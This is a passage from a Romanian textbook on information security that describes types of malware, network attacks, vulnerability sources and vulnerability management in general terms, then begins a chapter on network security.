infectate fişierele executabilele (cele ce au extensia .exe sau .com), fişierele overlay (au
extensia .ovl) sau fişierele de sistem (au extensia .sys sau .drv);

4
 viruşi de macro-uri – viruşii se plasează într-unul sau mai multe macro-uri din cadrul
documentelor de tip Microsoft Office şi utilizează funcţionalităţile Visual Basic for
Applications;
 viruşi pereche – sunt viruşii ce creează un fişier executabil nou, cu acelaşi nume, dar cu
extensia .com. Dacă sunt întâlnite două fişiere executabile cu acelaşi nume, dar cu
extensii diferite: .com şi .exe, sistemul de operare Microsoft Windows lansează întâi
fişierul cu extensia .com;
 viruşii de link-uri – sunt viruşii ce alterează structura de directoare, redirecţionând calea
directorului unui fişier infectat către zona în care este localizat virusul. După lansare,
virusul poate încărca fişierul executabil, citind calea corectă a directorului fişierului
respectiv;
 viruşi specifici – sunt viruşii ce infectează anumite aplicaţii:
o viruşi de ActiveX – sunt scrişi pentru a infecta produsele Microsoft; utilizează
un cod încărcat pe un server şi se răspândesc în staţiile locale;
o viruşii VB script – folosesc Visual Basic pentru a accesa un cod dăunător de
pe un server web şi a-l răspândi în staţiile de lucru locale; este suficientă
accesarea unei pagini web pentru a infecta sistemul local de operare;
o Java-viruşii – folosesc programele Java pentru a efectua operaţii nedorite pe
staţiile de lucru.
După modalitatea de funcţionare şi de tehnicile folosite, viruşii se clasifică în:
 viruşi invizibili – folosesc tehnici de mascare care ascund faptul că sistemul a fost
infectat. Când sistemul de operare încearcă să afle dimensiunea unui program infectat,
virusul ascuns scade o parte din aceste date, egală cu dimensiunea propriului cod şi o
înlocuieşte cu datele corecte. Astfel, dacă programul este doar citit de un scanner de
viruşi, dar nu este rulat, codul viral este ascuns şi nu poate fi detectat;
 viruşi polimorfici – folosesc o tehnică de modificare a propriului cod viral, utilizând
tehnici de criptare avansate. Acest proces de modificare se numeşte mutaţie. Prin
mutaţie, un virus îşi poate schimba dimensiunea şi compoziția. În plus, îşi pot modifica
semnătura, fiind astfel mult mai greu de detectat de programele antivirus.
 viruşi rezidenţi sau non-rezidenţi în memoria calculatorului:
o viruşi rezidenţi în memorie – se instalează la un nivel înalt al memoriei RAM
pentru a se ataşa fişierelor executabile sau documentelor de tip Microsoft
Office ce sunt deschise la un moment dat; aceşti viruşi pot controla întregul
sistem şi îl pot infecta oricând;
o viruşi non-rezidenţi – sunt activaţi numai la pornirea aplicaţiei gazdă;

5
9.2.2. Viermii informatici
Viermii informatici (worms) sunt programe cu efecte distructive ce utilizează comunicarea
între computere pentru a se răspândi. Viermii au trăsături comune cu viruşii, ei fiind capabili să se
multiplice, asemenea viruşilor, însă nu local, ci pe alte calculatoare, și folosesc reţelele de
calculatoare pentru a se răspândi pe alte sisteme. Spre deosebire de viruși însă, viermii nu pot
infecta un fişier - ei afectează sistemul.
Viermii se răspândesc automat în cadrul reţelelor de calculatoare după principiul „caută şi
distruge” (search and distroy). Ei caută calculatoare ce prezintă vulnerabilităţi, se instalează pe
sistemele respective, efectuează operaţiile distructive pentru care au fost programaţi, compromiţând
securitatea sistemelor respective, după care încearcă să se răspândească mai departe. Factorul de
multiplicare al viermilor este exponenţial.
Viermii se pot răspândi prin fişiere partajate în reţea, prin programele de mesagerie sau prin
programe de partajare de fişiere. Din acest punct de vedere se poate face următoarea clasificare a
viermilor:
 viermi de e-mail: se răspândesc prin fişierele infectate ataşate e-mail-urilor sau prin link-
urile către site-urile infectate;
 viermi de mesagerie instantanee: se răspândesc prin intermediul aplicaţiilor de
mesagerie instantanee prin trimiterea de link-uri către site-urile infectate pentru toţi
utilizatorii de pe lista de contacte locale;
 viermi de Internet: aceşti viermi scanează toate resursele de reţea disponibile utilizând
serviciile locale ale sistemului de operare şi caută calculatoarele vulnerabile din Internet
cu scopul de a se conecta la acestea şi a avea acces deplin la ele. O altă metodă este cea
de scanare a calculatoarelor vulnerabile din Internet ce nu au toate actualizările de
securitate făcute. Aceste actualizări pot fi trimise sub forma unor pachete de date ce
conţin viermele sau un utilitar ce va descărca şi instala viermele pe calculatorul
respectiv. De acolo viermele va căuta noi potenţiale gazde;
 viermi de IRC1: canalele de chat sunt ţinta principală a viermilor de IRC. Sunt trimise
tuturor utilizatorilor unui anumit canal fişiere infectate sau link-uri către site-uri
infectate cu viermi;
 viermi de fişiere partajate în reţea: se auto-copiază în directoarele partajate în reţea. sub
un nume inofensiv. Viermele va fi gata de transfer prin reţelele P2P şi apoi acţiunea de
infectare şi răspândire în reţea va continua.

1
IRC este un acronim pentru Internet Relay Chat (comunicare instantanee prin Internet), un serviciu de transmitere a
mesajelor în timp real (chat).
6
Viermii informatici aduc o serie întreagă de prejudicii calculatorului infectat, cum ar fi
distrugerea unor fişiere importante din sistemul de operare, deteriorarea funcţionării unor servicii
critice pentru sistem sau degradarea performanţelor sistemului. Alte acţiuni distructive ale viermilor
pot fi de creare a unor breşe în securitatea sistemelor informatice, de deschidere a unor porturi
pentru a permite ulterior accesul creatorilor lor la sistemul informatic infectat, de ştergere a
informaţiilor de pe hard disk sau chiar de lansare a unor atacuri de refuz al serviciilor – DoS.
Viermii pot fi programaţi să anunţe autorul acestora despre sistemele compromise pentru a le putea
accesa şi a efectua operaţii distructive.
Rabbit – este un vierme care încearcă să consume toate resursele de computer pe măsură ce
se repetă. Realizează atacuri la nivelele rețea și aplicație.
Bomba cu ceas este un virus sau un vierme (are proprietăți comune cu ambele categorii) care
se activează la un moment dat. De obicei, atacă la nivelul aplicație.
Bomba logică este un virus sau un vierme care se activează atunci când sunt îndeplinite
condițiile stabilite. De obicei, atacă la nivelul aplicație.
Un cal troian (trojan horse) este un vierme sau un virus care poate trimite informații înapoi
la inițiator sau poate fi utilizat de către inițiator sau atacator pentru a obține controlul asupra unui
sistem vizat. Mulți cai troieni s-au răspândit prin atașarea la un program util. De obicei, atacă la
nivelul aplicație.

9.2.3. Programe spion


Un program spion sau spyware este un software care poate fi instalat ca parte a altui
program. Poate fi instalat și atunci când un utilizator vizitează un site web cu cod rău intenționat sau
atunci când un proces în curs de încărcare îl încarcă și îl instalează. Acest program este conceput
pentru a raporta autorului programului spion ceea ce face utilizatorul calculatorului.
Programele spion sunt o categorie de software rău intenționat, atașate de obicei la programe
gratuite (jocuri, programe de schimbat fișiere, programe de chat pornografic, etc.), care captează pe
ascuns date de marketing (prin analiza siturilor pe care le vizitează utilizatorul, de exemplu de
modă, pantofi, cluburi de tenis, ș.a.m.d.) și le folosesc apoi pentru a transmite utilizatorului reclame
corespunzătoare dar nesolicitate. Programele spion care nu extrag date de marketing, ci doar
transmit reclame se numesc adware.
Există programe spion care modifică modul de comportare a unor motoare de căutare
(Google, Yahoo, MSN, etc.), pentru a trimite utilizatorului contra voinței sale la situri (scumpe)
care plătesc comisioane producătorului programului spion.
Unele programe spion abuzează de calculatorul utilizatorului pentru a face pe ascuns calcul
distribuit pentru altcineva, iar din acest motiv programele spion încetinesc calculatorul. În general,

7
chiar după ștergerea programelor gratuite care au instalat programul spion, acesta rămâne în
continuare activ.
În afară de tipurile de programe malware descrise mai sus este cazul de menționat încă două:
rootkit-ul și keylogger-ul.
Rootkit este un instrument utilizat de o terță parte pentru a menține controlul asupra
funcționării unui computer fără a fi detectat. De obicei se utilizează după ce a fost obținut controlul
asupra sistemului țintă.
Keylogger-ul realizează o acțiune de urmărire a tastelor apăsate de la tastatură sau mouse cu
scopul de monitorizare și înregistrare a semnalelor trimise, astfel încât persoana care utilizează
tastatura sau mouse-ul nu are cunoștință că acțiunile sale sunt supravegheate. Există numeroase
metode de tip keylogging: variază de la abordări hardware și software la analize acustice.

9.2.4. Protecția de software-ul rău intenționat


În paralel cu dezvoltarea de malware sunt elaborate și soluții respective de protecție:
antivirus, antispam, antimalware. Unele soluții antivirus moderne, cu toate că conțin sintagma
„virus” în numele lor, își propun să ofere protecție împotriva tuturor tipurilor de malware. Soluțiile
de securitate complete își extind arealul de protecție pentru a include așa funcții precum filtrarea
spamului sau controlul parental. Unele instrumente antimalware lucrează alături de instrumentele de
protecție de bază pentru a oferi securitate suplimentară împotriva amenințărilor specifice, cum ar fi
ransomware2.
Cu toate acestea, în majoritatea cazurilor, prezența unei astfel de aplicații antimalware
instalate poate să nu fie suficientă pentru o protecție completă. Este necesar de aplicat măsuri
suplimentare, cum sunt măsurile organizatorice și metodele și mijloacele cele tehnice de protecție a
informației.
Metodele organizatorice vizează utilizatorul calculatorului și sunt menite să schimbe
comportamentul utilizatorului, iar metodele tehnice vizează schimbările în sistemul informatic și
constau în utilizarea unor măsuri suplimentare de securitate care extind și completează capabilitățile
programelor antivirus. În capitolele 10 și 11 se prezintă o descriere mai detaliată a unor mijloace de
protecție de software-ul rău intenționat, dar și de alte tipuri de amenințări.

9.3. Tipuri de atacuri informatice


Software-ul rău intenționat nu este singurul tip de amenințare intenționată. Mai există și alte
tipuri de amenințări ale rețelelor și sistemelor informatice care sunt generate de spoofing, scanning,
snooping, scavenging, tunneling, personificare, refuzul accesului, spam, ingineria socială, atacuri

2
Ransomware este un software rău intenționat care, după ce se instalează pe dispozitivul victimei (calculator,
smartphone), criptează datele victimei ținându-le „ostatice” sau șantajează victima, pe care o amenință că îi va publica
datele dacă aceasta nu plătește o „răscumpărare” (în engleză ransom).
8
ale hackerilor, atacuri fizice, furtul de date sau echipamente, vandalism etc. În continuare urmează o
scurtă descriere ale acestor amenințări.
- Spoofing:
 IP spoofing este o metodă de atac, dar poate fi folosită şi pentru a ascunde identitatea
atacatorului sau pentru a lansa atacuri. Prin acest atac, pachetele TCP/IP sunt
manipulate, falsificând adresa sursă. În acest mod atacatorul poate căpăta acces
atribuindu-şi o identitate (adresa de IP) care are autorizare să acceseze resursa atacată.
Datorită falsificării adresei sursă a pachetului IP, atacatorul nu poate stabili decât o
comunicaţie unidirecţională (presupunând că nu este prezent în reţeaua locală a maşinii
atacate). Acest lucru face protocolul TCP nesusceptibil pentru asemenea atacuri. Există
însă numeroase servicii UDP care pot fi exploatate cu acest tip de atac;
 mascarada (masquerade) este un atac efectuat la nivelul rețea în care un atacator va
încerca să acceseze un computer, pretinzând că are o identitate de utilizator autorizat,
cum ar fi un administrator de rețea.
- Scanarea (scanning):
 scanarea secvențială (sequential scanning) este încercarea de conectare la un sistem
prin încercarea succesivă a diferitelor combinații de parole și ID-uri de utilizator;
 scanarea cu dicționar (dicționar scanning) este încercarea de conectare la un sistem prin
încercarea secvențială a parolelor de utilizator, care pot fi cuvinte din dicționar precum
cuvântul „parola”.
- Snooping sau Sniffing:
 digital snoping – monitorizarea unei rețele private sau publice pentru parole sau date;
acesta este un atac la nivelul rețea;
 shoulder snooping este un atac fizic în care cineva încearcă să urmărească parolele
tastate sau să vizualizeze informații la care nu ar trebui să le aibă acces pe monitorul
unui calculator.
- Scavenging:
 dumpster diving este încercarea de a obține informații din coșul de gunoi în speranța că
va permite atacatorului să obțină acces sau informații privilegiate;
 browsing – scanarea unor cantități mari de date neprotejate pentru a obține informații
pentru un acces mai mare; browsing-ul este, de obicei, automat și prezența unui
utilizator autorizat on-line la ore neobișnuite ar fi o indicație a acestui atac.
- Tunneling – este un atac care utilizează funcții de sistem de nivel inferior, cum ar fi un kernel al
sistemului de operare sau un driver de dispozitiv, pentru a trece de sistemul de securitate;

9
comportamentul ciudat al unui sistem, inclusiv defecțiuni ale dispozitivului sau o activitate
neobișnuită a hard disk-ului, poate indica acest tip de atac.
- Personificarea (personification) este un atac în care un adversar își asumă cu succes identitatea
uneia dintre părțile legitime într-un sistem sau într-un protocol de comunicații;
 atacul de tip replay repetă o sesiune de autentificare pentru a păcăli un calculator în
acordarea accesului;
 deturnarea sesiunii (session hijacking) - atacatorul monitorizează o sesiune între două
computere și injectează traficul făcându-l să pară că a venit de la unul dintre gazde;
legătura legală a calculatorului este abandonată, iar atacatorul continuă cu aceleași
privilegii pe care le avea și gazda legitimă; protecția constă în a folosi secvențe de
numere aleatorii, mai degrabă decât de cele previzibile, sau de a cripta datele folosite
pentru securizarea sesiunilor, deoarece atacatorul nu va putea să cripteze corect fără
cheia de criptare; fără cheia de criptare, comenzile decriptate venite de la atacator vor fi
doar „gunoi”;
 personoficarea unui router și trimiterea informațiilor de rutare false pentru a perturba
rețeaua sau a obține informații;
 otravirea DNS-ului (DNS cache poisoning) este o formă de hacking a rețelelor de
calculatoare în care datele numelui de domeniu stocate în memoria cache sunt
modificate de un atacator pentru a returna o adresă IP falsă, ceea ce face ca traficul să fie
direcționat spre computerul atacatorului (sau orice alt computer);
 otrăvirea ARP-ului (ARP poisoning) este o tehnică prin care un atacator trimite mesaje
de tip ARP către o rețea locală; în general, scopul este de a asocia adresa MAC a
atacatorului cu adresa IP a altei gazde, cum ar fi gateway-ul implicit, cauzând trimiterea
spre atacator a traficului destinat acelei adrese IP.
- Refuzul accesului (denial of service, DoS ):
 atacul SYN forțează computerul țintă, prin trimiterea unei succesiuni de solicitări SYN,
să aloce atât de multă memorie pentru conexiunile TCP, astfel încât să nu mai aibă
memorie pentru altceva;
 ping of death (sau pingul morții, în traducere liberă) este un tip de atac asupra unui PC
care implică trimiterea unui ping malițios către un sistem; un ping are, de obicei,
mărimea de 64 octeți (sau 84 dacă se ia în considerare și header-ul IP), iar majoritatea
sistemelor nu pot interpreta un ping mai mare decât mărimea maximă a pachetelor IP,
care este de 65.535 octeți; primirea unui ping de mărimea asta poate duce la blocarea
sistemului;

10
 atacul teardrop.c utilizează IP-ul pentru a crea probleme de reasamblare a pachetelor
astfel încât computerul țintă să se prăbușească; atacul folosește informația eronată a
antetului pachetului care indică fragmente de pachet suprapuse, astfel încât unele date
din unele pachete trebuie să suprascrie datele din alte pachete pentru a reasambla
pachetul; încercările de a reasambla aceste pachete cu date care se suprapun pot provoca
prăbușirea computerului dacă software-ul nu este pregătit să se ocupe de informațiile
eronate din antetul pachetului;
 atacul Land.c trimite un pachet TCP SYN folosind adresa IP a țintei ca expeditor și
receptor cauzând prăbușirea unor sisteme;
 atacul Smurf provoacă inundarea rețelelor cu trafic ICMP echo request (solicitare de
răspuns) difuzat pentru a provoca o congestie a rețelei; el trimite ping-ul ca un broadcast
cu o adresă de expeditor falsificată;
 atacul Frackle inundează rețelele cu trafic echo request pentru a provoca o congestie a
rețelei;
 atacul DDoS (DDoS attack) este un atac DoS distribuit în care traficul ce a inundat
victima provine din mai multe surse diferite; acest lucru face imposibilă stoparea
atacului pur și simplu prin blocarea unei singure surse;
 flooding - trimiterea mai multor solicitări valide către un sistem țintă pentru a-l
supraîncărca.
- Atacurile hackerilor:
 atacurile Directory Traversal încearcă să acceseze directoare care nu ar trebui să fie
accesate în încercarea de a rula un program pe un computer pe care utilizatorul nu ar
trebui să îl ruleze; de obicei, acest lucru se face pentru a rula fișierul cmd.exe pentru a
obține controlul unui server web sau al unui server de poștă electronică; acest atac
exploatează o lipsă de securitate, spre deosebire de exploatarea unei erori în cod;
 atacurile Cross-site Scripting sunt atacuri de tip injecție prin care script-urile rău-
intenționate sunt injectate în codul sursă al unui site web “trusted”, care în mod obișnuit
nu prezintă niciun pericol din punctul de vedere al securității; slăbiciunile care
facilitează aceste atacuri sunt destul de răspândite și apar oriunde există o aplicație web
care utilizează date de intrare de la un utilizator pentru generarea datelor de ieșire fără ca
acele informații să fie verificate sau codate; de obicei, atacatorul poate obține informații
stocate în cookie-uri folosind acest atac;
 atacul Man-In-The-Middle (MITM) constă în interpunerea pe traseu a atacatorului cu
plasarea logică de către acesta a propriului calculator într-un punct de intermediere între
alte două maşini; odată ajuns în această poziţie, atacatorul poate lansa o serie de atacuri

11
foarte periculoase, din cauza posibilităţii de interceptare a mesajelor transmise între
maşinile ţintă, astfel, un atacator are posibilitatea să citească şi să modifice mesajele
schimbate între doi corespondenţi fără ca cele două părţi să sesizeze faptul că metoda de
comunicare între ei a fost compromisă; atacul începe de obicei cu ascultarea canalului şi
se termină cu încercarea atacatorului de a înlocui mesajul interceptat, de a extrage
informaţii utile din el, de a redirecţiona mesajul la unele resurse externe; fie că subiectul
A planifică transmiterea spre subiectul B a unei informaţii oarecare; subiectul C posedă
cunoştinţe despre structura şi proprietăţile metodei de transmitere a datelor, precum şi a
însuşi faptului transmiterii acelei informaţii pe care intenţionează să o intercepteze;
pentru săvârşirea atacului C se „prezintă” lui A drept B, iar lui B drept A; subiectul A
consideră eronat că transmite informaţia lui B şi o trimite lui C, care la rândul său
efectuează unele operaţii cu ea (o copiază sau o modifică în scopuri personale) şi o
transmite lui B. Ultimul consideră că informaţia a fost primită direct de la A;
 atacul cu forță brută (brute-force attack) sau o căutare exhaustivă de cheie sau parolă
reprezintă un atac criptanalitic, ce poate fi folosit teoretic pentru orice tip de date
codificate (cu excepția datelor criptate într-un mod teoretic sigur); un astfel de atac ar
putea fi folosit când nu se poate profita de alte vulnerabilități din sistemul de criptare
(dacă există vreuna) prin care sarcina să fie mai ușoară; această metodă constă în
verificarea sistematică a tuturor cheilor (parolelor) posibile, până când este găsită cea
corectă; în cel mai rău caz, această metodă presupune traversarea întregului spațiu de
căutare;
- Spamming sau spam este procesul de expediere a mesajelor electronice nesolicitate, care în cele
mai multe cazuri sunt mesaje comerciale (oferte, promoții, etc.) și intenția expeditorului este de
a beneficia de publicitate la costuri foarte mici; exista însă mesaje spam care pot aduce daune
serioase destinatarilor: virușii conținuți în mesajele electronice pot deteriora sistemul de calcul,
inclusiv calculatoarele din rețeaua locală, e-mail phishing-ul, mai exact mesajele care par
trimise de o organizație legitimă, cu scopul de a obține în mod fraudulos informații cu caracter
personal, cum ar fi parole sau detalii ale cardului de credit etc., oferirea de produse sau afaceri
fabuloase dar în realitate false, cu scopul a atrage în diverse capcane sau pentru a vizita anumite
site-uri, mesaje de amenințare, hărțuire, blocarea comunicării serverelor de e-mail etc.;
- Ingineria socială este o minciună de înaltă calitate pentru a obține informații utile de la cineva
sau pentru a obține acces neautorizat, bazându-se pe tehnici cum sunt:
 folosirea telefonului pentru a obține informații, atacatorul pretinzând a fi cineva care de
fapt nu este.

12
 obținerea accesului fizic pretinzând că este un membru al personalului sau o persoană de
serviciu;
 phishing - trimiterea unui e-mail pretinzând a fi o bancă, o agenție sau un grup de
asistență, care instruiește o persoană să facă ceva cum ar fi deschiderea și rularea unui
fișier;
- Atacuri fizice sunt atacurile împotriva entităților fizice (clădiri, persoane, computere) pentru a
deteriora, a perturba, a modifica, a compromite o entitate fizică; atacul se face folosind un
proces fizic sau chimic (mișcarea fizică a persoanei sau a dronei, energia cinetică a glonțului,
explozia, incendiul, etc.) și este diferit de atacul logic în spațiul cibernetic;
- Furtul de date sau de echipament;
- Vandalismul.

9.4. Vulnerabilități de securitate


Pentru a obține rezultatele pe care le dorește, un atacator trebuie să se folosească de o
vulnerabilitate a calculatorului, rețelei sau sistemului.

9.4.1. Noțiune de vulnerabilitate


Vulnerabilitatea (vulnerability) este o slăbiciune a sistemului care permite o acțiune
neautorizată. Acestea sunt erori care apar în diferite faze ale dezvoltării și exploatării sistemelor și
în funcție de aceasta pot fi clasificate în felul următor:
 vulnerabilitate de proiectare (design vulnerability) – o eroare care apare în prima fază a
unui produs, aceea de concepere, și pe care chiar o implementare ulterioară perfectă nu o
va înlătura;
 vulnerabilitate de implementare (implementation vulnerability) – apare ca urmare a fazei
de punere în practică a proiectului;
 vulnerabilitate de configurare (configuration vulnerability) – apare ca urmare a erorilor
făcute în configurarea sistemului sau rețelei, cum ar fi folosirea codurilor de acces sau
drepturilor de scriere cu parole.
Vulnerabilitatea este intersecția a trei elemente: o susceptibilitate sau defect de sistem,
accesul atacatorului la defect și capacitatea atacatorului de a exploata defectul. Pentru a exploata o
vulnerabilitate, un atacator trebuie să aibă cel puțin un instrument sau o tehnică care să se poată
conecta la o slăbiciune a sistemului. În acest context, vulnerabilitatea este cunoscută și ca suprafața
de atac.

13
O vulnerabilitate cu unul sau mai multe cazuri cunoscute de atacuri funcționale și complet
implementate este clasificată ca o vulnerabilitate exploatabilă - o vulnerabilitate pentru care există
un exploit3.
Fereastra de vulnerabilitate este perioada de timp de la momentul în care breșa de securitate
a fost creată sau manifestată în software-ul implementat, până la momentul în care accesul a fost
eliminat, o soluție de securitate a fost disponibilă/instalată sau atacatorul a fost dezactivat.
Problema de securitate (defect de securitate) este un concept mai restrâns: există
vulnerabilități care nu sunt legate de software: vulnerabilitățile hardware, site-ul, personalul sunt
exemple de vulnerabilități care nu sunt erori de securitate software.
Vulnerabilitățile pot fi prezente oriunde în sistemele informatice: de la parole și erori de
configurare la breșele în politicile de securitate și factorul uman. Mai jos este dată o clasificare în
acest sens a surselor de vulnerabilități.
 Parole:
o parole slabe sau necompletate;
o partajarea parolelor;
o scrierea parolelor sau stocarea lor fără precauție;
o pierderea parolei.
 Erori umane:
o Trap Door - dezvoltatorii de sisteme își scriu uneori „uși secrete” (back door) pentru
accesul la aplicațiile lor pe care le pot uita uneori deschise;
o eroare de utilizator - ștergerea sau modificarea accidentală a programelor sau datelor;
o erori de configurare în sisteme, echipamente, antimalware, firewall, browser,
protocoale, permisiuni nesigure pentru conturi etc.;
o neutilizarea protocoalelor de criptare sau utilizarea unora slabe la transmiterea de
date confidențiale sau sensibile;
o comiterea erorilor la introducerea sau modificarea datelor, ștergerea accidentală a
datelor;
o utilizarea software-ului neautorizat sau nesigur (peer to peer, IM, screensavere, etc);
o aruncarea, depozitarea necorespunzătoare sau folosirea mediilor de stocare sau a
computerelor portabile cu informații sensibile;
o permiterea serviciilor care nu sunt necesare să ruleze pe un sistem informatic;
o încredere excesiva în toate domeniile;

3
Exploit (din verbul „to exploit”, în sensul de a folosi ceva în avantaj propriu) este o secvență de cod, o succesiune de
date sau un set de comenzi, ce profită de o defecțiune sau de o vulnerabilitate în scopul de a determina un
comportament nedorit sau neprevazut al software-ului, hardware-ului de pe un calculator sau de pe alt dispozitiv
electronic (de obicei computerizat). Acest comportament include în mod uzual obținerea controlului asupra sistemului
de calcul sau permiterea escaladării de privilegii sau refuzului de servicii.
14
o acțiuni inadecvate la logarea, monitorizarea sau detectarea amenințărilor la adresa
serverului sau a rețelei;
o datele de account ale foștilor angajați care au rămas active;
o acordare nepotrivită de privilegii;
o permiterea de directory traversal în sisteme, astfel încât un atacator să poată accesa
directoare care nu ar trebui să fie accesate;
o stocarea de informații sensibile în jurnale, cum ar fi parolele.
 Vulnerabilități software:
o buffer overflow – supraincarcarea memoriei cu date;
o vulnerabilitate la injectarea SQL, email, etc.;
o instabilitatea la mal-formed input;
o vulnerabilitate la Cross site scripting;
o vulnerabilitate la formatul string-ului;
o pierdere de memorie (memory leak);
o lipsa verificării autenticității cauzată de vulnerabilitatea atacului spoofing;
o generarea unor numere de sesiune insuficient de aleatorii care să împiedice
hijacking-ul;
o integer overflow;
o criptarea slabă la stocarea sau transmiterea datelor sensibile.
 Vulnerabilități de autentificare:
o mecanisme de autentificare slabe sau nefuncționale;
o criptarea slabă la autentificare.
 Vulnerabilități fizice:
o lăsarea în stare descuiată a birourilor, dulapurilor și a spațiilor de lucru, care ar trebui
să fie protejate;
o lipsa protecției cu parolă calculatorului;
 Politici:
o lipsa politicilor și procedurilor de securitate;
o aprobarea politicilor și procedurilor de securitate superficiale.

9.4.2. Managementul vulnerabilității


Managementul vulnerabilității este practica ciclică de identificare, clasificare, remediere și
atenuare a vulnerabilităților. Această practică se referă, în general, la vulnerabilitățile software din
sistemele de calcul.

15
Pentru a putea înlătura vulnerabilitățile, ele trebuie la timp identificate. Pentru a facilita acest
lucru au fost create diverse instrumente, numite scanere de vulnerabilități, care pot oferi o bună
imagine de ansamblu a vulnerabilităților posibile care există în sistem.
Scanerele de vulnerabilități sunt aplicații hardware sau software care servesc pentru
diagnosticarea și monitorizarea calculatoarelor, rețelelor, aplicațiilor și sistemelor în scopul
detectării eventualelor probleme în sistemul de securitate, precum și pentru evaluarea și eliminarea
vulnerabilităților.
Scanerele de vulnerabilități permit realizarea testării diverselor aplicații din sistem pentru a
găsi eventualele „găuri” care pot fi exploatate de către intruși. Instrumentele de nivel inferior, cum
ar fi scanerul de porturi, pot fi, de asemenea, folosite pentru a identifica și analiza posibilele
aplicații și protocoale care rulează în sistem.
Pentru asigurarea securității și integrității sistemului este necesar ca acesta să fie în
permanență monitorizat, instalate actualizări, utilizate instrumente care ajută la contracararea
posibilelor atacuri. În toate sistemele de operare cele mai utilizate au fost găsite vulnerabilități,
inclusiv Microsoft Windows, Mac OS, diverse opțiuni pentru UNIX (inclusiv GNU/Linux) și
OpenVMS. Întrucât permanent apar noi vulnerabilități, singura modalitate de a reduce
probabilitatea de utilizare a acestora împotriva sistemului este vigilență constantă și utilizarea
versiunii actualizate ale software-ului.
Oricât de eficiente ar fi instrumentele care ne ajută în lupta cu vulnerabilitățile, ele nu pot
înlocui implicarea umană în evaluarea lor. Pentru a asigura o activitate continua și eficientă în
companie, este nevoie de o evaluare corectă a sistemelor IT, în doua cuvinte: de un audit IT.
Auditul de securitate IT este o soluție din ce în ce mai importanta pentru companiile și organizațiile
zilelor noastre. Auditul de securitate IT are ca scop determinarea tuturor vulnerabilităților
sistemului informatic. Rezultatul acestei acțiuni este evaluarea obiectivă a necesitaților sistemului
informatic al companiei precum și sugerarea unei soluții viabile pentru eliminarea vulnerabilităților
sale.

9.5. Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Faceți o clasificare a amenințărilor la adresa securității informațiilor.
2. Descrieți succint principalele grupe de surse de amenințări la adresa securității
informațiilor.
3. Realizați un studiu al resurselor Internet pentru a realiza o analiză comparativă a
celor mai frecvente amenințări la adresa securității informației pentru ultimii 5 ani.
4. Realizați un studiu al resurselor Internet pentru a realiza o analiză comparativă a
celor mai frecvent utilizate malware în ultimii 3 ani și a daunelor cauzate de astfel de
software.
5. Realizați un studiu utilizând resurse Internet pentru a realiza o analiză comparativă a
evoluției vulnerabilităților de securitate și a atacurilor pe parcursul ultimilor 5 ani.

16
17
TEMA 11: SECURITATEA REȚELELOR DE CALCULATOARE

Obiectivele temei:
 Introducere în securitatea rețelelor.
 Identificarea metodelor de atac asupra rețelelor de calculatoare.
 Analiza unor instrumente de protecție în rețea:

Cuvinte-cheie:
atacuri active, sisteme de prevenire a
atacuri pasive, scurgerilor/pierderilor de
sisteme de detectare și date,
prevenire a intruziunilor, rețele virtuale private,
software-ul antivirus firewall,
(anti-malware), analiza comportamentală.

O mare parte dintre diversele tipuri de atacuri asupra securității informației analizate mai sus
sunt aplicate și în rețelele de calculatoare. Chiar dacă există tehnici de prevenire a amenințărilor la
adresa securității rețelei, ele nu pot garanta securitatea completă a acesteia.

11.1. Noțiune de securitatea rețelei


Securitatea rețelei se referă la orice activitate menită să protejeze uzabilitatea1 și integritatea
rețelei și a datelor, și include atât tehnologii hardware cât și software. O securitate eficientă a rețelei
gestionează accesul la rețea și vizează o varietate de amenințări, împiedicându-le să intre sau să se
răspândească în interiorul rețelei.
Securitatea rețelei combină mai multe nivele de defensivă, fiind aplicată atât la frontierele
rețelei, cât și în interiorul ei, implementând politicile și controalele necesare pentru ca utilizatorii
autorizați să obțină acces la resursele de rețea, iar actorii rău-intenționați să fie blocați în încercările
de a realiza exploit-uri și amenințări.
Securitatea rețelei este bazată pe mai multe componente, cele mai utilizate din ele fiind
expuse succint mai jos.
Controlul accesului. Nu toți utilizatorii trebuie să aibă acces la rețea. Pentru a împiedica
atacatorii potențiali, trebuie ca fiecare utilizator și fiecare dispozitiv să fie recunoscut, după care să
fie aplicate politicile de securitate. Trebuie să existe posibilitatea de blocare a dispozitivele
neconforme sau să le fie acordat acces limitat. Acest proces se numește controlul accesului la rețea
(network access control - NAC).

1
Uzabilitatea unei rețele sau a unui sistem reprezintă eficiența și ușurința folosirii lui spre satisfacția utilizatorilor.
Software antivirus și antimalware. Cele mai bune programe antimalware nu numai că
scanează traficul la intrare, ci și continuă să urmărească în continuare fișierele pentru a găsi
anomalii, a elimina programele malware și a fixa pagubele produse.
Protecția aplicațiilor software. Orice aplicație software utilizată pentru facilitarea unei
afaceri trebuie să fie protejată, indiferent dacă este achiziționată sau este proiectată și realizată de
propriul personal IT. Din păcate, orice aplicație poate conține găuri sau vulnerabilități pe care
atacatorii le pot folosi pentru a se infiltra în rețea. Securitatea aplicațiilor include hardware-ul,
software-ul și procesele utilizate pentru astuparea acestor găuri.
Analiza comportamentală. Pentru a detecta comportamentul anormal al rețelei, trebuie să fie
cunoscut comportamentul ei normal. Instrumentele de analiză comportamentală discern automat
activitățile care se abat de la normă, iar cu ajutorul acestor instrumente, identificând factorii care
prezintă o problemă potențială de compromitere a rețelei, personalul responsabil de securitate poate
remedia operativ amenințările.
Prevenirea pierderilor de date (DLP - data loss prevention). Întreprinderile și organizațiile
trebuie să se asigure că personalul lor nu trimite informații sensibile în afara rețelei. Tehnologiile de
prevenire a pierderilor de date, pot împiedica oamenii să încarce, să transmită sau chiar să imprime
într-un mod nesigur informații critice.
Protecția e-mailului. Gateway-urile serviciilor de e-mail reprezintă vectorul de amenințare
numărul unu pentru încălcarea securității rețelei. Atacatorii folosesc informații personale și tehnici
de inginerie socială pentru a construi campanii sofisticate de phishing pentru a înșela destinatarii și
a le trimite pe site-urile care oferă malware. O aplicație de securitate a e-mailurilor blochează
atacurile la intrare și controlează mesajele la ieșire pentru a preveni pierderea datelor sensibile.
Firewall-urile reprezintă o barieră între rețeaua internă de încredere a întreprinderii și
rețelele externe nesigure, cum ar fi Internetul, folosind un set de reguli definite pentru a permite sau
bloca traficul. Un paravan de protecție poate fi hardware, software sau ambele. La ziua de azi exisă
dispozitive de gestionare unificată a amenințărilor (unified threat management - UTM) și firewall-
uri de generație nouă focusate pe amenințări.
Sisteme de prevenire a intruziunilor. Un sistem de prevenire a intruziunilor (IPS) scanează
traficul de rețea pentru a bloca în mod activ atacurile. Dispozitivele IPS de generație nouă fac acest
